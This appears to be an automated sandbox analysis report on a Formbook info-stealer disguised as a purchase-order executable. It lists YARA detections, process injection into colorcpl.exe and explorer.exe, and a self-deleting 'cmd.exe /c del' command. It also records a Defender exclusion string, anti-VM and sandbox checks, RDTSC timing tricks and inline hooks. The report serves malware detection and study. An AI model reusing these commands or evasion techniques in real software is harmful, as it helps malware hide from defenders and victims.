          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02542FB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0255E428
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02542D90
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 0452B150 appears 35 times
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: String function: 0131B150 appears 72 times
          Source: NEW ORDER ELO-05756485.exeBinary or memory string: OriginalFilename vs NEW ORDER ELO-05756485.exe
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll" vs NEW ORDER ELO-05756485.exe
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.351832870.0000000000B88000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs NEW ORDER ELO-05756485.exe
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll2 vs NEW ORDER ELO-05756485.exe
          Source: NEW ORDER ELO-05756485.exeBinary or memory string: OriginalFilename vs NEW ORDER ELO-05756485.exe
          Source: NEW ORDER ELO-05756485.exe, 00000002.00000002.393412768.00000000012C3000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs NEW ORDER ELO-05756485.exe
          Source: NEW ORDER ELO-05756485.exe, 00000002.00000002.393948133.000000000159F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NEW ORDER ELO-05756485.exe
          Source: NEW ORDER ELO-05756485.exeBinary or memory string: OriginalFilenamePackingSize.exeB vs NEW ORDER ELO-05756485.exe
          Source: NEW ORDER ELO-05756485.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.392670755.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.392670755.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.392967604.0000000000E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.392967604.0000000000E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.598954001.0000000002B60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.598954001.0000000002B60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.598682434.0000000002540000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.598682434.0000000002540000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: NEW ORDER ELO-05756485.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@3/3
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NEW ORDER ELO-05756485.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_01
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeMutant created: \Sessions\1\BaseNamedObjects\eOVZmXVdxEDwjESg
          Source: NEW ORDER ELO-05756485.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: NEW ORDER ELO-05756485.exeVirustotal: Detection: 37%
          Source: NEW ORDER ELO-05756485.exeReversingLabs: Detection: 27%
          Source: unknownProcess created: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe 'C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe'
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess created: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess created: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: NEW ORDER ELO-05756485.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: NEW ORDER ELO-05756485.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: colorcpl.pdbGCTL source: NEW ORDER ELO-05756485.exe, 00000002.00000002.393394404.00000000012C0000.00000040.00000001.sdmp
          Source: Binary string: colorcpl.pdb source: NEW ORDER ELO-05756485.exe, 00000002.00000002.393394404.00000000012C0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.378250105.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: NEW ORDER ELO-05756485.exe, 00000002.00000002.393436003.00000000012F0000.00000040.00000001.sdmp, colorcpl.exe, 00000008.00000002.599409173.0000000004500000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: NEW ORDER ELO-05756485.exe, colorcpl.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.378250105.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_028B6810 push 00C300B2h; ret
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_073855E9 push edx; ret
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_0761CD7B push cs; ret
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_0761DD56 pushfd ; retf
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0041D0D2 push eax; ret
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0041D0DB push eax; ret
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0041D085 push eax; ret
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0041D13C push eax; ret
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_00417BC5 push esi; iretd
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_00403658 push edi; ret
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0136D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0457D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02557BC5 push esi; iretd
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0255D0D2 push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0255D0DB push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0255D085 push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0255D13C push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02543658 push edi; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0255ECAB push edi; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0255DD51 pushad ; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.8543293857

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xE8
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: NEW ORDER ELO-05756485.exe PID: 6616, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 00000000025498E4 second address: 00000000025498EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 0000000002549B5E second address: 0000000002549B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe TID: 6620Thread sleep time: -104772s >= -30000s
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe TID: 6652Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6828Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 3900Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeThread delayed: delay time: 104772
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000003.00000000.374574766.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000003.00000000.374627355.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.355167796.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.369458651.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000003.00000002.612166674.00000000062E0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
          Source: explorer.exe, 00000003.00000002.612422468.0000000006418000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000003.00000000.369458651.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000003.00000002.612422468.0000000006418000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000003.00000000.374574766.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000003.00000000.374357007.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000003.00000000.369458651.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.374357007.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.374627355.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000003.00000000.369458651.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000003.00000000.355167796.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01334120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01334120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01334120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01334120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01334120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01319100 mov eax, dword ptr fs:[00000030h]
